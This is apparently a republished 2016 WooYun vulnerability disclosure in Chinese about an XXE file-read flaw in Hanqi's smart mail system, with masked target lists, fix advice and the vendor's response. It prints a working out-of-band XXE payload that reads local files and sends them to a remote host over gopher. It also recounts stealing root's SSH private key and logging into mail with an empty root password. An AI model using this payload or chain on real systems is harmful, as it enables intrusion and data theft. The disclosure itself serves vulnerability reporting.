汉启科技智能邮件系统一个XXE文件读取引发的血案

admin
admin
admin
140491
文章
117
评论
2017年4月3日08:39:59评论370 views字数 240阅读0分48秒阅读模式
摘要

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2016-189058

漏洞标题: 汉启科技智能邮件系统一个XXE文件读取引发的血案

相关厂商: 深圳市汉启网络科技有限公司

漏洞作者: 刺刺

提交时间: 2016-03-25 21:40

公开时间: 2016-05-13 10:40

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 配置错误

1人收藏

漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开

简要描述:

RT

详细说明:

汉启科技的智能邮件群发(触发系统)存在Xfire任意文件读取的问题

陈老师的link:

http://**.**.**.**/bugs/wooyun-2010-0166751

列目录的list.xml

code 区域 
<!ENTITY % a SYSTEM "file:///">
 <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://remote_ip:port/?%a;'>">
 %b;
 %c;

读取文件的dtd

code 区域 
<!ENTITY % a SYSTEM "file:///">
 <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://remote_ip:port/?%a;'>">
 %b;
 %c;

使用AWVS来验证:

汉启科技智能邮件系统一个XXE文件读取引发的血案

存在问题的URL有很多:

写了个脚本,将以上hosts的IP段全跑了一遍,结果如下:

mask 区域 
*******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 *******/se*****
 1.://**.**.**/smartedm/services_
 2.://**.**.**/smartedm/services_
 3.://**.**.**/smartedm/services_
 4.://**.**.**/smartedm/services_
 5.://**.**.**/smartedm/services_
 6.://**.**.**/smartedm/services_
 7.://**.**.**/smartedm/services_
 8.://**.**.**/smartedm/services_
 9.://**.**.**/smartedm/services_
 10.://**.**.**/smartedm/services_
 11.://**.**.**/smartedm/services_
 12.://**.**.**/smartedm/services_
 13.://**.**.**/smartedm/services_
 14.://**.**.**/smartedm/services_
 15.://**.**.**/smartedm/services_
 16.://**.**.**/smartedm/services_
 17.://**.**.**/smartedm/services_
 18.://**.**.**/smartedm/services_
 19.://**.**.**/smartedm/services_
 20.://**.**.**/smartedm/services_
 21.://**.**.**/smartedm/services_
 22.://**.**.**/smartedm/services_
 23.://**.**.**/smartedm/services_
 24.://**.**.**/smartedm/services_
 25.://**.**.**/smartedm/services_
 26.://**.**.**/smartedm/services_
 27.://**.**.**/smartedm/services_
 28.://**.**.**/smartedm/services_
 29.://**.**.**/smartedm/services_
 30.://**.**.**/smartedm/services_
 31.://**.**.**/smartedm/services_
 32.://**.**.**/smartedm/services_
 33.://**.**.**/smartedm/services_
 34.://**.**.**/smartedm/services_
 35.://**.**.**/smartedm/services_
 36.://**.**.**/smartedm/services_
 37.://**.**.**/smartedm/services_
 38.://**.**.**/smartedm/services_
 39.://**.**.**/smartedm/services_
 40.://**.**.**/smartedm/services_
 41.://**.**.**/smartedm/services_
 42.://**.**.**/smartedm/services_
 43.://**.**.**/smartedm/services_
 44.://**.**.**/smartedm/services_
 45.://**.**.**/smartedm/services_
 46.://**.**.**/smartedm/services_
 47.://**.**.**/smartedm/services_
 48.://**.**.**/smartedm/services_
 49.://**.**.**/smartedm/services_
 50.://**.**.**/smartedm/services_
 51.://**.**.**/smartedm/services_
 52.://**.**.**/smartedm/services_
 53.://**.**.**/smartedm/services_
 54.://**.**.**/smartedm/services_
 55.://**.**.**/smartedm/services_
 56.://**.**.**/smartedm/services_
 57.://**.**.**/smartedm/services_
 58.://**.**.**/smartedm/services_
 59.://**.**.**/smartedm/services_
 60.://**.**.**/smartedm/services_
 61.://**.**.**/smartedm/services_
 62.://**.**.**/smartedm/services_
 63.://**.**.**/smartedm/services_
 64.://**.**.**/smartedm/services_
 65.://**.**.**/smartedm/services_
 66.://**.**.**/smartedm/services_
 67.://**.**.**/smartedm/services_
 68.://**.**.**/smartedm/services_
 69.://**.**.**/smartedm/services_
 70.://**.**.**/smartedm/services_
 71.://**.**.**/smartedm/services_
 72.://**.**.**/smartedm/services_
 73.://**.**.**/smartedm/services_
 74.://**.**.**/smartedm/services_
 75.://**.**.**/smartedm/services_
 76.://**.**.**/smartedm/services_
 77.://**.**.**/smartedm/services_
 78.://**.**.**/smartedm/services_
 79.://**.**.**/smartedm/services_
 80.://**.**.**/smartedm/services_
 81.://**.**.**/smartedm/services_
 82.://**.**.**/smartedm/services_
 83.://**.**.**/smartedm/services_
 84.://**.**.**/smartedm/services_
 85.://**.**.**/smartedm/services_
 86.://**.**.**/smartedm/services_
 87.://**.**.**/smartedm/services_
 88.://**.**.**/smartedm/services_
 89.://**.**.**/smartedm/services_
 90.://**.**.**/smartedm/services_
 91.://**.**.**/smartedm/services_
 92.://**.**.**/smartedm/services_
 93.://**.**.**/smartedm/services_
 94.://**.**.**/smartedm/services_
 95.://**.**.**/smartedm/services_
 96.://**.**.**/smartedm/services_
 97.://**.**.**/smartedm/services_
 98.://**.**.**/smartedm/services_
 99.://**.**.**/smartedm/services_
 100.://**.**.**/smartedm/services_
 101.://**.**.**/smartedm/services_
 102.://**.**.**/smartedm/services_
 103.://**.**.**/smartedm/services_
 104.://**.**.**/smartedm/services_
 105.://**.**.**/smartedm/services_
 106.://**.**.**/smartedm/services_
 107.://**.**.**/smartedm/services_
 108.://**.**.**/smartedm/services_
 109.://**.**.**/smartedm/services_
 110.://**.**.**/smartedm/services_
 111.://**.**.**/smartedm/services_
 112.://**.**.**/smartedm/services_
 113.://**.**.**/smartedm/services_
 114.://**.**.**/smartedm/services_
 115.://**.**.**/smartedm/services_
 116.://**.**.**/smartedm/services_
 117.://**.**.**/smartedm/services_
 118.://**.**.**/smartedm/services_
 119.://**.**.**/smartedm/services_
 120.://**.**.**/smartedm/services_
 121.://**.**.**/smartedm/services_
 122.://**.**.**/smartedm/services_
 123.://**.**.**/smartedm/services_
 124.://**.**.**/smartedm/services_
 125.://**.**.**/smartedm/services_
 126.://**.**.**/smartedm/services_
 127.://**.**.**/smartedm/services_
 128.://**.**.**/smartedm/services_
 129.://**.**.**/smartedm/services_
 130.://**.**.**/smartedm/services_
 131.://**.**.**/smartedm/services_
 132.://**.**.**/smartedm/services_
 133.://**.**.**/smartedm/services_
 134.://**.**.**/smartredm/services_
 135.://**.**.**/smartredm/services_
 136.://**.**.**/smartredm/services_
 137.://**.**.**/smartredm/services_
 138.://**.**.**/smartredm/services_
 139.://**.**.**/smartredm/services_
 140.://**.**.**/smartredm/services_
 141.://**.**.**/smartredm/services_
 142.://**.**.**/smartredm/services_
 143.://**.**.**/smartredm/services_
 144.://**.**.**/smartredm/services_
 145.://**.**.**/smartredm/services_
 146.://**.**.**/smartredm/services_
 147.://**.**.**/smartredm/services_
 148.://**.**.**/smartredm/services_
 149.://**.**.**/smartredm/services_
 150.://**.**.**/smartredm/services_
 151.://**.**.**/smartredm/services_
 152.://**.**.**/smartredm/services_
 153.://**.**.**/smartredm/services_
 154.://**.**.**/smartredm/services_
 155.://**.**.**/smartredm/services_
 156.://**.**.**/smartredm/services_
 157.://**.**.**/smartredm/services_
 158.://**.**.**/smartredm/services_
 159.://**.**.**/smartredm/services_
 160.://**.**.**/smartredm/services_
 161.://**.**.**/smartredm/services_
 162.://**.**.**/smartredm/services_
 163.://**.**.**/smartredm/services_
 164.://**.**.**/smartredm/services_
 165.://**.**.**/smartredm/services_
 166.://**.**.**/smartredm/services_
 167.://**.**.**/smartredm/services_
 168.://**.**.**/smartredm/services_
 169.://**.**.**/smartredm/services_
 170.://**.**.**/smartredm/services_
 171.://**.**.**/smartredm/services_
 172.://**.**.**/smartredm/services_
 173.://**.**.**/smartredm/services

至于其他的用户我就不列举了。

XXE读取文件的时候,发现/root/.ssh/目录居然有id_rsa文件;

汉启科技智能邮件系统一个XXE文件读取引发的血案

内容可以读取(用户通知了你们XXE漏洞,但是没有告诉你们自己的问题吧)

读取回来的id_rsa内容被url编码了,这里本人比较菜

URL decode会将内容中的加号给修改成空格,验证几次都特么不对;

还有就是新建的id_rsa在windows环境上传到linux环境格式不对,折腾了好久

终于搞定了。

汉启科技智能邮件系统一个XXE文件读取引发的血案

漏洞证明:

使用id_rsa登录主机:

汉启科技智能邮件系统一个XXE文件读取引发的血案

其实都是一个主机多个网卡啊

mask 区域 
*****-a|grep '*****
 *****t:**.**.**.** *****
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****st:**.**.**.*******
 *****区,密*****
 ******.**.*******
 ******.**.*******
 ******.**.*******
 ******.**.*******
 ******.**.*******

汉启科技智能邮件系统一个XXE文件读取引发的血案

这么的服务器,都不知道如何群发了……

其中**.**.**.**居然和**.**.**.**邮箱在同一个服务器上

邮箱是Exmail root密码为空

汉启科技智能邮件系统一个XXE文件读取引发的血案

登录邮箱:

汉启科技智能邮件系统一个XXE文件读取引发的血案

邮箱的内容就不多演示了,看你们的客户多好啊。

汉启科技智能邮件系统一个XXE文件读取引发的血案

修复方案:

1.可根据陈老师的建议修复xfire,或建议用户在防火墙上功能限制80 8080 8081端口的访问;

2. id_rsa记得百度一下,这个不需要放到目标服务器的.ssh目录的;

3. 如果对我本人不放心的话,记得修改全公司用户的邮箱密码。

4. 多看乌云,产品少漏洞!

版权声明:转载请注明来源 刺刺@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-29 10:38

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

2016-05-23:已全面修复

2016-05-23:需要更新jar包的,请到 http://pan.baidu.com/s/1jIwEvf4 提取密码 69nt

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

0%

0%

0%

0%

评价

  1. 2016-05-25 11:51 | pudding2 ( 普通白帽子 | Rank:151 漏洞数:52 | 凡心所向,素履所往,生如逆旅,一苇以航)

    0

    学习了,光看陈老师的干货没看明白,结合你的实例才看懂了

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin